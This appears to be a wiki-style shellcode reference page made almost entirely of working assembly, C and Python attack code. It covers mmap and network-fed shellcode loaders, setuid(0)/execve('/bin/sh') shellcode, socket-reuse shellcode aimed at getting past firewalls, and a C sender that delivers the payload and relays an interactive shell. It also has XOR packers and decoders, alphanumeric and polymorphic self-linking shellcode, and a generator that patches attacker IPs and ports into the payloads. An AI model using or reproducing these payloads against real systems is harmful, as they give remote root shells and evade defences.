Special thanks to hatter and jtripper for their contributions to this article.
Documentation: shellcode loaders
See also: environmental documentation, environmental shellcode
Description: 64-bit mmap-based executable shellcode loader (returns to shellcode)
# 79 bytes .section .data .section .text .globl _start _start: pop %rbx # argc pop %rbx # arg0 pop %rbx # arg1 pointer push $0x9 pop %rax xor %rdi, %rdi push %rdi pop %rsi inc %rsi shl $0x12, %rsi push $0x7 pop %rdx push $0x22 pop %r10 push %rdi push %rdi pop %r8 pop %r9 syscall # The syscall for the mmap(). inject: xor %rsi, %rsi push %rsi pop %rdi inject_loop: cmpb %dil, (%rbx, %rsi, 1) je inject_finished movb (%rbx, %rsi, 1), %r10b movb %r10b, (%rax,%rsi,1) inc %rsi jmp inject_loop ret_to_shellcode: push %rax ret inject_finished: inc %rsi movb $0xc3, (%rax, %rsi, 1) call ret_to_shellcode exit: push $60 pop %rax xor %rdi, %rdi syscall |
Description: 32-bit mmap-based executable shellcode loader (returns to shellcode)
# 66 bytes .section .data .section .text .global _start _start: pop %edi pop %edi pop %edi #get arg1 pointer (shellcode) push $90 pop %eax #mmap() syscall number xor %ebx, %ebx push %ebx push %ebx #args 5/6 (null) push $0x22 #arg 4 push $0x7 #arg 5 push %ebx pop %ecx inc %ecx shl $0x12, %ecx push %ecx #arg2 (0x1000) push %ebx #arg1 (null) mov %esp, %ebx #move pointer to args to ebx for mmap() int $0x80 inject: xor %esi, %esi push %esi pop %edx #zero out esi and edx inject_loop: cmpb %dl, (%edi, %esi, 1) je inject_finished movb (%edi, %esi, 1), %cl movb %cl, (%eax, %esi, 1) inc %esi jmp inject_loop #places shellcode into mmap() memory ret_to_shellcode: push %eax #pushes mmap memory address and returns to it ret inject_finished: inc %esi movb $0xc3, (%eax, %esi, 1) #adds ret to the code code so that loader can exit call ret_to_shellcode exit: xor %eax, %eax mov %eax, %ebx inc %eax int $0x80 #exit |
Description: Dynamically linked mmap-based executable shellcode loader (contains GOT)
#include <stdio.h> #include <sys/mman.h> #include <string.h> int main(int argc, char *argv[]) { int (*fp)(); void *mem = mmap(0, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); memcpy(mem, argv[1], strlen(argv[1])); fp = (int(*)())mem; (int)(*fp)(); } |
Description: Dynamically linked mmap and socket based executable shellcode loader (contains GOT)
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/mman.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> void error(const char *msg) { perror(msg); exit(1); } void execute(char *buffer) { void (*mem)() = mmap(0, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); memcpy(mem, buffer, strlen(buffer)); (*mem)(); } int main(int argc, char *argv[]) { char buffer[1024]; int serverfd, clientfd; socklen_t client_len; struct sockaddr_in server_addr, client_addr; client_len = sizeof(client_addr); if (argc != 2) { printf("Usage: %s <port>\n", argv[0]); exit(1); } server_addr.sin_family = AF_INET; server_addr.sin_addr.s_addr = INADDR_ANY; server_addr.sin_port = htons(atoi(argv[1])); if((serverfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) error(" [!] opening socket"); if (bind(serverfd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) error(" [!] bind()"); if (listen(serverfd, 0) < 0) error(" [!] listen()"); if ((clientfd = accept(serverfd, (struct sockaddr *)&client_addr, &client_len)) < 0) error(" [!] accept()"); printf(" [*] Received %d bytes, executing.\n", read(clientfd,buffer,1024)); execute(buffer); printf(" [*] Closing sockets.\n"); close(clientfd); close(serverfd); return 0; } |
Documentation: null-free shellcode
Description: Null-free file writing shellcode
# 90 bytes _start: xorl %ecx, %ecx xorl %edx, %edx #use xor to zero out the registers (removed some not required) push $0x05 #push 0x05 (single byte to remove the null padding used in longs) pop %eax #pop that value into eax push $0x6c #push part of the file destination as a byte to remove padding pushl $0x6f6c2f70 pushl $0x6f746b73 pushl $0x65442f74 pushl $0x6f6f722f movl %esp, %ebx #move out stack pointer xorw $0x0641, %cx #xor the file options as a word into ecx (ecx is 0 so ecx value would be 641) xorw $0x01b6, %dx #xor the file permissions as a word into edx (ecx is 0 so edx value would be 1b6) #by using this method of xoring out the nullbytes code size can be reduced as well #as remove the null bytes int $0x80 #execute open() movl %eax, %ebx #move the file handle into ebx for write() push $0x04 #push 0x04 pop %eax #pop it into eax for use in write() pushl $0x6c6f6c6a #push part of the null terminated hex string onto the stack pop %ecx #pop it into ecx for modification shr $0x08, %ecx #shift it to the right by 0x08 to put the nullbyte back into the string without #having it directly in the code pushl %ecx #push the modified string back onto the stack pushl $0x20736920 pushl $0x73696874 movl %esp, %ecx #move the stack pointer to ecx push $0xb #push the size of the stack in hex pop %edx #pop it back into the proper register pushl %ebx #push the file descriptor onto the stack for the next function int $0x80 #write the file pop %ebx #get the file descriptor back push $0x06 #push 0x06 to the stack pop %eax #pop it into eax for close() int $0x80 #close the file push $0x01 #push exit() onto the stack pop %eax #and put it in the register push $0x05 #push the return value of 5 pop %ebx #and put it in ebx int $0x80 #and exit |
Description: null-free setuid(0); execve('/bin/sh') shellcode
# 32 bytes .text .globl _start _start: xor %rdi,%rdi pushq $0x69 pop %rax syscall push %rdi push %rdi pop %rsi pop %rdx pushq $0x68 movabs $0x7361622f6e69622f,%rax push %rax push %rsp pop %rdi pushq $0x3b pop %rax syscall |
Documentation: environment
Description: 64-bit getpc
# 12 - bytes jmp startup getpc: mov (%rsp), %rax ret startup: call getpc # the %rax register now contains %rip on the next line |
Description: Alternative 64-bit getpc method
# 10 bytes jmp startup pc: nop startup: lea -1(%rip), %rax # the %rax register now contains the address of `pc'. |
Description: 32-bit getpc
# 11 bytes jmp startup getpc: mov (%esp), %eax ret startup: call getpc # the %eax register now contains %eip on the next line |
Description: Breakpoint detection shellcode
# 24 bytes .text .global _start _start: jmp startup go_retro: pop %rcx inc %rcx jmp *%rcx startup: call go_retro volatile_segment: push $0x3458686a push $0x0975c084 nop |
Description: 32-bit last call example
# 4 bytes mov -0x4(%esp), %eax |
Description: 64-bit last call example
# 5 bytes mov -0x8(%rsp), %rax |
Description: Alphanumeric last call example
# 13 bytes .text .global _start _start: pop %rax push %rsp # move pointer to %rsp into %rax pop %rax xor $0x65,%al # subtract 0x10 from %rax xor $0x75,%al xor %rsi,(%rax) xor (%rax),%rsi # move address to last instruction into %rax |
Documentation: socket reuse documentation
Description: socket reusing shellcode to bypass firewalls
# 117 bytes .section .data .section .text .globl _start _start: jmp start exit: push $0x3c pop %rax syscall start: push $0x02 pop %rdi make_fd_struct: lea -0x14(%rsp), %rdx movb $0x10, (%rdx) lea 0x4(%rdx), %rsi # move struct into rsi loop: inc %edi test %di, %di # loop until 65535 then exit je exit stack_fix: lea 0x14(%rdx), %rsp get_peer_name: sub $0x20, %rsp push $0x34 pop %rax syscall check_pn_success: test %al, %al jne loop # If we make it here, rbx and rax are 0 check_ip: push $0x1b pop %rcx mov $0xfeffff80, %ebx not %ebx cmpl %ebx, (%rsp,%rcx,4) jne loop check_port: movb $0x35, %cl mov $0x2dfb, %bx not %bx cmpw %bx,(%rsp, %rcx ,2) # (%rbp,%rsi,2) jne loop reuse: push %rax pop %rsi dup_loop: # redirect stdin, stdout, stderr to socket push $0x21 pop %rax syscall inc %esi cmp $0x4, %esi jne dup_loop execve: pop %rdi push %rdi push %rdi pop %rsi pop %rdx # Null out %rdx and %rdx (second and third argument) mov $0x68732f6e69622f6a,%rdi # move 'hs/nib/j' into %rdi shr $0x8,%rdi # null truncate the backwards value to '\0hs/nib/' push %rdi push %rsp pop %rdi # %rdi is now a pointer to '/bin/sh\0' push $0x3b pop %rax # set %rax to function # for execve() syscall # execve('/bin/sh',null,null); |
Description: sends socket reuse shellcode
#include <sys/socket.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> // source: char shellcode[] = { "\xeb\x05\x6a\x3c\x58\x0f\x05\x6a\x02\x5f\x48\x8d\x54\x24\xec\xc6" "\x02\x10\x48\x8d\x72\x04\xff\xc7\x66\x85\xff\x74\xe5\x48\x8d\x62" "\x14\x48\x83\xec\x20\x6a\x34\x58\x0f\x05\x84\xc0\x75\xe8\x6a\x1b" "\x59\xbb\x80\xff\xff\xfe\xf7\xd3\x39\x1c\x8c\x75\xd9\xb1\x35\x66" "\xbb\xfb\x2d\x66\xf7\xd3\x66\x39\x1c\x4c\x75\xca\x50\x5e\x6a\x21" "\x58\x0f\x05\xff\xc6\x83\xfe\x04\x75\xf4\x5f\x57\x57\x5e\x5a\x48" "\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f" "\x6a\x3b\x58\x0f\x05" }; void error(char *err) { perror(err); exit(0); } int main(int argc, char *argv[]) { struct sockaddr_in server_addr, bind_addr; struct hostent* server, *_bind; char buf[1024], inbuf[1024]; int sock; _bind = gethostbyname(argv[3]); bind_addr.sin_family = AF_INET; bind_addr.sin_port = htons(atoi(argv[4])); memcpy(&bind_addr.sin_addr.s_addr, _bind->h_addr, _bind->h_length); server = gethostbyname(argv[1]); server_addr.sin_family = AF_INET; memcpy(&server_addr.sin_addr.s_addr, server->h_addr, server->h_length); server_addr.sin_port = htons(atoi(argv[2])); if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) error(" [!] socket()"); if (bind(sock, (struct sockaddr *)&bind_addr, sizeof(bind_addr)) < 0) error(" [!] bind()"); printf(" [*] Connecting to %s\n", argv[1]); if (connect(sock, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) error(" [*] connect()"); printf(" [*] Sending payload\n"); if (send(sock, shellcode, strlen(shellcode), MSG_NOSIGNAL) < 0) error(" [!] write()"); while(fgets(buf, 1024, stdin) != NULL) { if (send(sock, buf, strlen(buf), MSG_NOSIGNAL) < 0) error(" [!] write(): "); if (recv(sock, inbuf, 1024, 0) < 0) error(" [!] read(): "); printf("%s", inbuf); memset(inbuf, 0, 1024); memset(buf, 0, 1024); } return 0; } |
Documentation: self-modifying code
See also: environmental documentation, environmental shellcode, shellcode loading documentation, shellcode loaders
Description: Shellcode packer
# 55 bytes .section .data .section .text .globl _start _start: pop %rbx # argc pop %rbx # arg0 pop %rbx # arg1 pointer xor %rsi, %rsi push $0x34 pop %rdi count_chars: cmpb %dil, (%rbx, %rsi, 1) int3 je write xor $0x16, (%rbx, %rsi, 1) inc %rsi jmp count_chars write: mov $0x1, %rax mov $0x1, %rdi mov %rsi, %rdx mov %rbx, %rsi syscall exit: push $60 pop %rax xor %rdi, %rdi syscall |
Description: Unpacker without mmap
# 69 bytes jmp start inject: pop %rdi # return value xor %rsi, %rsi push %rsi pop %rdi inject_loop: cmpb $0x17, (%rbx, %rsi, 1) je inject_finished movb (%rbx, %rsi, 1), %r10b xor $0x16, %r10b movb %r10b, (%rbx, %rsi, 1) inc %rsi jmp inject_loop inject_finished: inc %rsi movb $0xc3, (%rbx, %rsi, 1) push %rdi push %rbx ret getpc: mov (%rsp),%rbx ret start: call getpc add $0xe,%rbx push %rbx call inject exit: push $0x3c pop %rax xor %rdi, %rdi syscall |
Description: Shellcode unpacker using mmap
# 102 bytes jmp start inject: pop %rdi pop %rcx pop %rax xor %rsi, %rsi push %rsi pop %rdi inject_loop: cmpb $0x20, (%rax, %rsi, 1) je inject_finished movb (%rax, %rsi, 1), %r10b xor $0x3, %r10b movb %r10b, (%rcx, %rsi, 1) inc %rsi jmp inject_loop inject_finished: inc %rsi movb $0xc3, (%rcx, %rsi, 1) push %rdi push %rcx ret getpc: mov (%rsp),%rbx ret start: call getpc add $0x31,%rbx push $0x9 pop %rax xor %rdi, %rdi push %rdi pop %rsi inc %rsi shl $0x12, %rsi push $0x7 pop %rdx push $0x22 pop %r10 push %rdi push %rdi pop %r8 pop %r9 syscall # The syscall for the mmap(). push %rax push %rbx call inject exit: push $60 pop %rax xor %rdi, %rdi syscall |
Description: 32-bit shellcode packer
# 37 bytes .section .data .section .text .global _start _start: pop %ecx pop %ecx pop %ecx #arg1 pointer xor %ebx, %ebx push %ebx pop %edx #zero out ebx and edx count_chars: cmpb %dl, (%ecx, %ebx, 1) je write xor $0x3, (%ecx, %ebx, 1) inc %ebx jmp count_chars #counts characters and xor encode them write: push $4 pop %eax mov %ebx, %edx push $2 pop %ebx int $0x80 #writes encoded chars to stdout exit: xor %eax, %eax mov %eax, %ebx inc %eax int $0x80 #exits |
Description: 32-bit shellcode decoder
# 89 bytes .section .data .section .text .global _start _start: jmp start inject: pop %ecx #pop the return address pop %ebx #pop the encoded shellcode start address pop %eax #pop the mmaped memory address xor %edx, %edx push %edx pop %ecx #zero out edx and ecx (which holds the return address) inject_loop: cmpb $0x20, (%ebx, %edx, 1) je inject_finished movb (%ebx, %edx, 1), %cl xor $0x3, %cl movb %cl, (%eax, %edx, 1) inc %edx jmp inject_loop inject_finished: inc %edx movb $0xc3, (%eax, %edx, 1) push %ecx push %eax ret getpc: mov (%esp), %eax ret start: call getpc #find ourself on stack mov %eax, %edx add $0x2a, %edx #add decoder length to find shell beginging push $90 pop %eax #mmap() syscall xor %ebx, %ebx push %ebx push %ebx #arg 5/6 push $0x22 #arg 4 push $0x7 #arg 3 push %ebx pop %ecx inc %ecx shl $0x12, %ecx push %ecx #arg2 0x1000 push %ebx #arg 1 mov %esp, %ebx int $0x80 push %eax #push mmap pointer push %edx #push our shellcode begining call inject exit: xor %eax, %eax mov %eax, %ebx inc %eax int $0x80 |
Documentation: alphanumeric shellcode
See also: environmental documentation, environmental shellcode
Description: Alphanumeric architecture detection shellcode
Description: Alphanumeric /bin/sh shellcode
XTX4e4uH10H30VYhJG00X1AdTYXHcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394cEB00 |
# 104 bytes .text .global _start _start: pop %rax push %rsp pop %rax xor $0x65,%al xor $0x75,%al xor %rsi, (%rax) # mov emulated into rsi xor (%rax), %rsi push %rsi pop %rcx pushq $0x3030474a pop %rax xor %eax,0x64(%rcx) push %rsp pop %rcx pop %rax movslq 0x30(%rcx),%rsi xor %esi,0x30(%rcx) movslq 0x34(%rcx),%rsi xor %esi,0x34(%rcx) movslq 0x30(%rcx),%rdi movslq 0x30(%rcx),%rsi push %rdi pop %rdx pushq $0x5a58555a pop %rax xor $0x34313775,%eax xor %eax,0x30(%rcx) pushq $0x6a51475a pop %rax xor $0x6a393475,%eax xor %eax,0x34(%rcx) xor 0x30(%rcx),%rdi pop %rax push %rdi pushq $0x58 movslq (%rcx),%rdi xor (%rcx),%rdi pop %rax push %rsp xor (%rcx),%rdi xor $0x63,%al rex.RB rex.X xor %sil,(%rax) |
Documentation: ELF parsing shellcode
Description: ELF64 symbol parser
# 188 bytes .section .data .section .text .globl _start _start: jmp startup strlen: xor %rdx, %rdx next_byte: inc %rdx cmpb $0x00, (%rsi,%rdx,1); jne next_byte ret getpc: mov (%rsp), %rax ret startup: xor %r15, %r15 push $0x0a0a0a mov %rsp, %r15 call getpc dec %rax xor %rcx, %rcx push $0x2 pop %rsi find_header: cmpl $0x464c457f, (%rax,%rcx,4) # Did we find our ELF base pointer? je find_sections dec %rax jmp find_header find_sections: # %rax now = base pointer of ELF image. xor %rbx, %rbx add $0x28, %bl xorl (%rax,%rbx,1), %ecx # %rcx = offset to section headers addq %rax, %rcx # %rcx = absolute address to section headers # each section header is 0x40 bytes in length. next_section: xor %rbx, %rbx xor %rbp, %rbp add $0x40, %rcx # %rcx now = address to first entry add $0x04, %bl xor (%rcx,%rbx,1), %ebp # %rbp now contains type cmp $0x02, %bpl jne next_section found_symbols: xor %r8, %r8 mov %rcx, %r8 # %rcx = pointer to top of symbol section header add $0x40, %r8 # %r8 = pointer to top of string table section header xor %rbx, %rbx xor $0x18, %bl # pointer to actual section is $0x18 bytes from header base xor %r9, %r9 xor %r10, %r10 xor (%rcx,%rbx,1), %r9 xor (%r8,%rbx,1), %r10 addq %rax, %r9 # r9 should now point to the first symbol addq %rax, %r10 # r10 should now point to the first string addq $0x18, %r9 next_symbol: addq $0x18,%r9 xor %rcx, %rcx xor %rbp, %rbp xor %rdi, %rdi xor (%r9,%rcx,1), %ebp # %rbp now contains string offset. cmp %rbp, %rdi je next_symbol print_symbol_name: mov %rbp, %rsi addq %r10, %rsi # %rsi should now be a pointer to a string push $0x01 pop %rax push %rax pop %rdi call strlen syscall push $0x01 pop %rax push %rax pop %rdi push $0x02 pop %rdx push %r15 pop %rsi syscall jmp next_symbol |
Documentation: dynamic shellcode
See also: environmental documentation, environmental shellcode, self-modifying documentation, self-modifying shellcode
Description: Polymorphic self-linking file descriptor reuse shellcode
# 268 bytes .section .data .section .text .global _start _start: push $0x400130ff pop %rbx shr $0x8, %ebx fast_got: mov (%rbx), %rcx add 0x10(%rbx), %rcx extract_pointer: mov 0x20(%rcx), %rbx find_base: dec %rbx cmpl $0x464c457f, (%rbx) jne find_base jmp startup __initialize_world: pop %rcx jmp _world # at this point, the base pointer of libc is in %rbx startup: call __initialize_world ################ # # Takes a function hash in %rbp and base pointer in %rbx # >Parses the dynamic section headers of the ELF64 image # >Uses ROP to invoke the function on the way back to the # -normal return location # # Returns results of function to invoke. # invoke_function: push %rbp push %rbp push %rdx xor %rdx, %rdx push %rdi push %rax push %rbx push %rsi push %rbp pop %rdi read_dynamic_section: push %rbx pop %rbp push $0x4c pop %rax add (%rbx, %rax, 4), %rbx check_dynamic_type: add $0x10, %rbx cmpb $0x5, (%rbx) jne check_dynamic_type string_table_found: mov 0x8(%rbx), %rax # %rax is now location of dynamic string table mov 0x18(%rbx), %rbx # %rbx is now a pointer to the symbol table. check_next_hash: add $0x18, %rbx push %rdx pop %rsi xorw (%rbx), %si add %rax, %rsi calc_hash: push %rax push %rdx initialize_regs: push %rdx pop %rax cld calc_hash_loop: lodsb rol $0xc, %edx add %eax, %edx test %al, %al jnz calc_hash_loop calc_done: push %rdx pop %rsi pop %rdx pop %rax cmp %esi, %edi jne check_next_hash found_hash: add 0x8(%rbx,%rdx,4), %rbp mov %rbp, 0x30(%rsp) pop %rsi pop %rbx pop %rax pop %rdi pop %rdx pop %rbp ret exit: push $0x696c4780 pop %rbp xor %rdi, %rdi call *%rcx _world: movl $0xf8cc01f7, %ebp # getpeername() is in %rbp push $0x02 pop %rdi make_fd_struct: lea -0x14(%rsp), %rdx movb $0x10, (%rdx) lea 0x4(%rdx), %rsi # move struct into rsi loop: inc %di jz exit stack_fix: lea 0x14(%rdx), %rsp get_peer_name: sub $0x20, %rsp push %rcx call *%rcx pop %rcx check_pn_success: test %al, %al jne loop # If we make it here, rbx and rax are 0 check_ip: push $0x1b pop %r8 mov $0xfeffff80, %eax cmpl %eax, (%rsp,%r8,4) jne loop check_port: movb $0x35, %r8b mov $0x2dfb, %ax cmpw %ax,(%rsp, %r8 ,2) # (%rbp,%rsi,2) jne loop push $0x70672750 pop %rbp reuse: xor %rdx, %rdx push %rdx push %rdx pop %rsi dup_loop: # redirect stdin, stdout, stderr to socket push %rcx call *%rcx pop %rcx inc %esi cmp $0x4, %esi jne dup_loop movl $0xf66bbb37, %ebp xor %rdi, %rdi push %rdi push %rdi pop %rsi pop %rdx # Null out %rdx and %rdx (second and third argument) mov $0x68732f6e69622f6a,%rdi # move 'hs/nib/j' into %rdi shr $0x8,%rdi # null truncate the backwards value to '\0hs/nib/' push %rdi push %rsp pop %rdi # %rdi is now a pointer to '/bin/sh\0' call *%rcx |
Description: Self-linking file descriptor reuse shellcode
# 268 bytes .section .data .section .text .global _start _start: push $0x400130ff pop %rbx shr $0x8, %ebx fast_got: mov (%rbx), %rcx add 0x10(%rbx), %rcx extract_pointer: mov 0x20(%rcx), %rbx find_base: dec %rbx cmpl $0x464c457f, (%rbx) jne find_base jmp startup __initialize_world: pop %rcx jmp _world # at this point, the base pointer of libc is in %rbx startup: call __initialize_world ################ # # Takes a function hash in %rbp and base pointer in %rbx # >Parses the dynamic section headers of the ELF64 image # >Uses ROP to invoke the function on the way back to the # -normal return location # # Returns results of function to invoke. # invoke_function: push %rbp push %rbp push %rdx xor %rdx, %rdx push %rdi push %rax push %rbx push %rsi push %rbp pop %rdi read_dynamic_section: push %rbx pop %rbp push $0x4c pop %rax add (%rbx, %rax, 4), %rbx check_dynamic_type: add $0x10, %rbx cmpb $0x5, (%rbx) jne check_dynamic_type string_table_found: mov 0x8(%rbx), %rax # %rax is now location of dynamic string table mov 0x18(%rbx), %rbx # %rbx is now a pointer to the symbol table. check_next_hash: add $0x18, %rbx push %rdx pop %rsi xorw (%rbx), %si add %rax, %rsi calc_hash: push %rax push %rdx initialize_regs: push %rdx pop %rax cld calc_hash_loop: lodsb rol $0xc, %edx add %eax, %edx test %al, %al jnz calc_hash_loop calc_done: push %rdx pop %rsi pop %rdx pop %rax cmp %esi, %edi jne check_next_hash found_hash: add 0x8(%rbx,%rdx,4), %rbp mov %rbp, 0x30(%rsp) pop %rsi pop %rbx pop %rax pop %rdi pop %rdx pop %rbp ret exit: push $0x696c4780 pop %rbp xor %rdi, %rdi call *%rcx _world: movl $0xf8cc01f7, %ebp # getpeername() is in %rbp push $0x02 pop %rdi make_fd_struct: lea -0x14(%rsp), %rdx movb $0x10, (%rdx) lea 0x4(%rdx), %rsi # move struct into rsi loop: inc %di jz exit stack_fix: lea 0x14(%rdx), %rsp get_peer_name: sub $0x20, %rsp push %rcx call *%rcx pop %rcx check_pn_success: test %al, %al jne loop # If we make it here, rbx and rax are 0 check_ip: push $0x1b pop %r8 mov $0xfeffff80, %eax not %eax cmpl %eax, (%rsp,%r8,4) jne loop check_port: movb $0x35, %r8b mov $0x2dfb, %ax not %eax cmpw %ax,(%rsp, %r8 ,2) # (%rbp,%rsi,2) jne loop push $0x70672750 pop %rbp reuse: xor %rdx, %rdx push %rdx push %rdx pop %rsi dup_loop: # redirect stdin, stdout, stderr to socket push %rcx call *%rcx pop %rcx inc %esi cmp $0x4, %esi jne dup_loop movl $0xf66bbb37, %ebp pop %rdi push %rdi push %rdi pop %rsi pop %rdx # Null out %rdx and %rdx (second and third argument) mov $0x68732f6e69622f6a,%rdi # move 'hs/nib/j' into %rdi shr $0x8,%rdi # null truncate the backwards value to '\0hs/nib/' push %rdi push %rsp pop %rdi # %rdi is now a pointer to '/bin/sh\0' call *%rcx |
Description: Self-linking exit shellcode
# 135 bytes .section .data .section .text .global _start _start: push $0x400130ff pop %rbx shr $0x8, %ebx fast_got: mov (%rbx), %rcx add 0x10(%rbx), %rcx extract_pointer: mov 0x20(%rcx), %rbx find_base: dec %rbx cmpl $0x464c457f, (%rbx) jne find_base jmp startup __initialize_world: pop %rcx jmp _world # at this point, the base pointer of libc is in %rbx startup: call __initialize_world ################ # # Takes a function hash in %rbp and base pointer in %rbx # >Parses the dynamic section headers of the ELF64 image # >Uses ROP to invoke the function on the way back to the # -normal return location # # Returns results of function to invoke. # invoke_function: push %rbp push %rbp push %rdx xor %rdx, %rdx push %rdi push %rax push %rbx push %rsi push %rbp pop %rdi read_dynamic_section: push %rbx pop %rbp push $0x4c pop %rax add (%rbx, %rax, 4), %rbx check_dynamic_type: add $0x10, %rbx cmpb $0x5, (%rbx) jne check_dynamic_type string_table_found: mov 0x8(%rbx), %rax # %rax is now location of dynamic string table mov 0x18(%rbx), %rbx # %rbx is now a pointer to the symbol table. check_next_hash: add $0x18, %rbx push %rdx pop %rsi xorw (%rbx), %si add %rax, %rsi calc_hash: push %rax push %rdx initialize_regs: push %rdx pop %rax cld calc_hash_loop: lodsb rol $0xc, %edx add %eax, %edx test %al, %al jnz calc_hash_loop calc_done: push %rdx pop %rsi pop %rdx pop %rax cmp %esi, %edi jne check_next_hash found_hash: add 0x8(%rbx,%rdx,4), %rbp mov %rbp, 0x30(%rsp) pop %rsi pop %rbx pop %rax pop %rdi pop %rdx pop %rbp ret _world: push $0x696c4780 pop %rbp xor %rdi, %rdi call *%rcx |
See also: socket-reuse documentation, socket-reuse shellcode, self-modifying documentation, self-modifying shellcode, dynamic documentation, dynamic shellcode
Description: Socket-reuse shellcode generator
#!/usr/bin/python2.7 import re, sys, socket, struct if len(sys.argv) < 3: print("Usage: " + sys.argv[0] + " <source IP> <source port> [dynamic]") exit() standard_shellcode = \ "\\xeb\\x05\\x6a\\x3c\\x58\\x0f\\x05\\x6a\\x02\\x5f\\x48\\x8d\\x54\\x24\\xec\\xc6" \ "\\x02\\x10\\x48\\x8d\\x72\\x04\\xff\\xc7\\x66\\x85\\xff\\x74\\xe5\\x48\\x8d\\x62" \ "\\x14\\x48\\x83\\xec\\x20\\x6a\\x34\\x58\\x0f\\x05\\x84\\xc0\\x75\\xe8\\x6a\\x1b" \ "\\x59\\xbb%s\\xf7\\xd3\\x39\\x1c\\x8c\\x75\\xd9\\xb1\\x35\\x66\\xbb%s\\x66\\xf7" \ "\\xd3\\x66\\x39\\x1c\\x4c\\x75\\xca\\x50\\x5e\\x6a\\x21\\x58\\x0f\\x05\\xff\\xc6" \ "\\x83\\xfe\\x04\\x75\\xf4\\x5f\\x57\\x57\\x5e\\x5a\\x48\\xbf\\x6a\\x2f\\x62\\x69" \ "\\x6e\\x2f\\x73\\x68\\x48\\xc1\\xef\\x08\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x0f\\x05" dynamic_shellcode = \ "\\x68\\xff\\x30\\x01\\x40\\x5b\\xc1\\xeb\\x08\\x48\\x8b\\x0b\\x48\\x03\\x4b\\x10" \ "\\x48\\x8b\\x59\\x20\\x48\\xff\\xcb\\x81\\x3b\\x7f\\x45\\x4c\\x46\\x75\\xf5\\xeb" \ "\\x03\\x59\\xeb\\x6a\\xe8\\xf8\\xff\\xff\\xff\\x55\\x55\\x52\\x48\\x31\\xd2\\x57" \ "\\x50\\x53\\x56\\x55\\x5f\\x53\\x5d\\x6a\\x4c\\x58\\x48\\x03\\x1c\\x83\\x48\\x83" \ "\\xc3\\x10\\x80\\x3b\\x05\\x75\\xf7\\x48\\x8b\\x43\\x08\\x48\\x8b\\x5b\\x18\\x48" \ "\\x83\\xc3\\x18\\x52\\x5e\\x66\\x33\\x33\\x48\\x01\\xc6\\x50\\x52\\x52\\x58\\xfc" \ "\\xac\\xc1\\xc2\\x0c\\x01\\xc2\\x84\\xc0\\x75\\xf6\\x52\\x5e\\x5a\\x58\\x39\\xf7" \ "\\x75\\xdd\\x48\\x03\\x6c\\x93\\x08\\x48\\x89\\x6c\\x24\\x30\\x5e\\x5b\\x58\\x5f" \ "\\x5a\\x5d\\xc3\\x68\\x80\\x47\\x6c\\x69\\x5d\\x48\\x31\\xff\\xff\\xd1\\xbd\\xf7" \ "\\x01\\xcc\\xf8\\x6a\\x02\\x5f\\x48\\x8d\\x54\\x24\\xec\\xc6\\x02\\x10\\x48\\x8d" \ "\\x72\\x04\\x66\\xff\\xc7\\x74\\xdc\\x48\\x8d\\x62\\x14\\x48\\x83\\xec\\x20\\x51" \ "\\xff\\xd1\\x59\\x84\\xc0\\x75\\xeb\\x6a\\x1b\\x41\\x58\\xb8%s\\xf7\\xd0\\x42" \ "\\x39\\x04\\x84\\x75\\xda\\x41\\xb0\\x35\\x66\\xb8%s\\xf7\\xd0\\x66\\x42\\x39" \ "\\x04\\x44\\x75\\xca\\x68\\x50\\x27\\x67\\x70\\x5d\\x48\\x31\\xd2\\x52\\x52\\x5e" \ "\\x51\\xff\\xd1\\x59\\xff\\xc6\\x83\\xfe\\x04\\x75\\xf5\\xbd\\x37\\xbb\\x6b\\xf6" \ "\\x48\\x31\\xff\\x57\\x57\\x5e\\x5a\\x48\\xbf\\x6a\\x2f\\x62\\x69\\x6e\\x2f\\x73" \ "\\x68\\x48\\xc1\\xef\\x08\\x57\\x54\\x5f\\xff\\xd1" if len(sys.argv) == 4 and sys.argv[3] == "dynamic": shellcode = dynamic_shellcode else: shellcode = standard_shellcode convert = lambda x: ''.join(['\\x%.2x' % (ord(char) ^ 0xff) for char in x]) ip_addr = convert(socket.inet_aton(sys.argv[1])) port_no = convert(struct.pack("!H", int(sys.argv[2]))) shellcode = shellcode % (ip_addr, port_no) for lin in re.findall(".?"*64, shellcode): if lin != "": print("\"" + lin + "\"") |
Description: Nicely assemble and output shellcode in a variety of formats (raw, hex, and as a C variable)
#!/usr/bin/python2 import os import re import argparse def detect_file_type(path): file_type = os.popen("file %s" % path).read(200) if "assembler" in file_type: return 0 elif "ELF" in file_type: return 1 else: print "Incompatible file type, quitting." exit() def extract(path): if not detect_file_type(path): orig_path = path path = path.split(".")[0] if os.system("as -o %s.o %s" % (path, orig_path)) == 1: print " [!] Assembly failed." exit() if os.system("ld -o %s %s.o" % (path, path)) == 1: print " [!] Linking failed." exit() shellcode = "" for line in os.popen("objdump -d %s" % path).readlines(): for byte in line.split(): if re.match("^[a-f0-9][a-f0-9]$", byte): shellcode += chr(int(byte, 16)) return shellcode if __name__=="__main__": parser = argparse.ArgumentParser() parser.add_argument('--file', required=True) parser.add_argument('--hex', action='store_true', help="Output in hex format (\\x0f\\x05)") parser.add_argument('--raw', action='store_true', help="Output in raw format") parser.add_argument('--var', action='store_true', help="Output as a variable") parser.add_argument('--len', action='store_true', help="Output the length") args = parser.parse_args() shellcode = extract(args.file) if args.hex or args.var: tmp = ''.join(["\\x%.2x" % ord(byte) for byte in shellcode]) if args.var: tmp2 = "char shellcode[] = {\n" for line in re.findall(".?"*64, tmp): if line != "": tmp2 += " \"%s\" \n" % line tmp = tmp2 + "};" print tmp elif args.raw: print shellcode else: parser.print_help() exit() if args.len: print " [*] Length: %d bytes" % len(shellcode) |
Description: Hash generator for self-linking shellcode
